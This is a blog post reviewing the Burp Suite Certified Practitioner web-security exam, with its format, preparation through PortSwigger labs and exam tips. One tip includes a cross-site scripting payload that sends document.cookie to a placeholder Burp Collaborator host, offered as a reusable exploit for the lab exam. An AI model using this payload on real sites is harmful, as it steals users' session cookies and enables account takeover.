The following post is a review of the Burp Suite Certified Practitioner certification, its key learnings and how does one prepare for the exam. This post contains no spoilers and only guides people on what to expect from the certification. All information in the post is publicly mentioned on the PortSwigger website.
Information about exam and who should take it?
The exam costs $99 per attempt and consists to solve 2 real-world applications or 6/6 stages within a 4-hour timeframe. Portswigger has collaborated with Examly for proctoring the exam. This exam is for students, bug bounty hunters, or experienced professionals who want to demonstrate their web security knowledge and burp skills.
This certification does not exactly reflect your proficiency with Burp Suite but tests your web application pentest skills and how Burp can be leveraged to find these issues.
The exam format
There are three stages in each of the 2 applications to test:
Stage 1: Access any user account.
Stage 2: Use your user account to access the admin interface at /admin, perhaps by elevating your privileges or compromising the administrator account.
Stage 3: Use the admin interface to read the contents of /home/carlos/secret from the server’s filesystem, and submit it using “submit solution”.
You need to clear all 6/6 stages for both applications to pass.
Note: Each stage has to be solved sequentially. You cannot skip directly to stage 2 i.e., administrator account. You need to solve stage 1 i.e., get user account (generally carlos) to use various endpoints used for escalation of privilege.
Preparing for Exam
There are various materials and free labs provided by portswigger to help study for the exam. Once you create an account on portswigger, you will be presented with a dashboard at https://portswigger.net/web-security/dashboard which will highlight your learning progress
Portswigger Labs
At the time of writing this post, there are about 210 lab challenges in PortSwigger Labs. There are 22 topics of vulnerabilities categories like Server-side topics, Client-side topics, and Advanced topics. These labs reflect real-world findings during pentests.
Learning Path – https://portswigger.net/web-security/learning-path
Practice Exam
Once you’ve gone through every Apprentice and Practitioner lab and head over to https://portswigger.net/web-security/certification/how-it-works#what-the-exam-involves and read the guide.
It is of utmost necessity to take the practice exam as it simulates the real exam environment and prepares you for what to expect at each stage. You can take the practice exam as many times as you want. Once started the practice exam you can head back and observe the time remaining and stages completed for that particular machine. This is quite handy to see in the exam where multiple things were tried and if you were successful in passing that particular stage.
Tips for exam:
Tip 1: Open any note taking application / Microsoft excel to prepare a table of all lab solutions.
After you have completed solving all labs or you have the necessary knowledge to take the exam, open each lab and note down the solution in the table. This will help you cross-reference all vulnerabilities and their solutions in a short period. Make sure you have documented all exploit codes which can be reused by the application.
For example, the fetch function in JavaScript should be handy for to generate an exploit code for stealing cookies via Cross-Site Scripting and can be stored as follows:
Steal cookies collaborator:
<script>
fetch(‘https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net’, {method: ‘POST’,mode: ‘no-cors’,body:document.cookie});
</script>
Steal Cookies Exploit Server:
Here is an example on how to store solutions and exploits in notion tables:
Tip 2: This exam relies more on your speed rather than complete exploitation
You need to complete 100% of the exam or solve 6/6 stages to get certified. Hence it is necessary to practice labs where you need to deliver exploit to the victim, create exploit scripts, email functionality, etc. so that you don’t spend unnecessary time understanding these key concepts in every application.
Don’t overcomplicate any stage or get too deep in a rabbit hole. Please note that these applications are intentionally vulnerable and can be solved easily. Just try to think what is the most basic thing that could have been done here and tweak it a bit to get the necessary outcome.
Keep a look at your time, you have approximately 40 minutes for each stage.
Tip 3: Each stage can be cross referenced to the types of vulnerabilities you can observe.
Objective for Stage 1: Get any user access
Description: Black box pentest of the application to gain access to authenticated application via one user
Examples:
- SQL Injection
- Cross-Site Scripting
- Authentication / Credentials Brute force
- Request Smuggling
- Web Cache Poisoning
Objective for Stage 2: Get Admin access
Description: Any vulnerabilities leveraged features only accessible via authenticated user or privilege escalation to administrator
Examples:
- SQL Injection
- Cross-Site Scripting
- Cross Site Request Forgery
- HTTP host header attacks
- Server-Side Request Forgery
- Access Control vulnerabilities
- Authentication / Credentials Brute force
Objective for Stage 3: Read Contents of ‘/home/carlos/secret’
Description: Any vulnerabilities that can execute code on the server or read files on the server
Examples:
- XML External Entities
- SQL Injection
- Command Injection
- Server-Side Template Injection
- Path Traversal
- File Upload attacks
- Insecure Deserialization
Tip 4: Do not tamper with existing accounts or files on server
There is no reset option available that allows you to restart a lab. Portwigger has mentioned this clearly in the FAQ and thus you will waste your attempt.
Tip 5: Scan all the way
There is no restriction to the types of tools required for testing the applications so you can start using as many tools available blindly. Although this is not appropriate for real pentests as they have to be restricted to the environment you’re in, here you have the freedom to use anything that works for you. This tip is because of the time restriction and it is quite difficult to figure out the underlying vulnerability in a short time frame. Start the burp active scan and a few extensions like Param Miner as soon as you are onboarded to a lab. But again, use effectively on endpoints that don’t modify any data or you could end up changing something that would crash the server and waste your attempt.
Tools or things to get familiar with:
Final Thoughts:
The certification is not an exam but a learning experience with hands-on vulnerability discovery and prevention. The certification price is relatively cheaper as compared to others so it is nice to have this under your belt. The environment provided by portswigger to learn in free labs makes it easier for people to learn what’s coming in store for them. As there is no restriction on the tools used the exam does allow you to explore all possibilities and could improve your thinking abilities in real pentests.
Overall, it’s a challenge placed well together to allow users to explore multiple exploitation techniques across the majority of web application challenges. The PortSwigger team provides valuable knowledge with its tools, labs, and research. Would recommend all to take up this as a challenge.
My certificate: https://portswigger.net/web-security/e/c/4a553bc932e15d80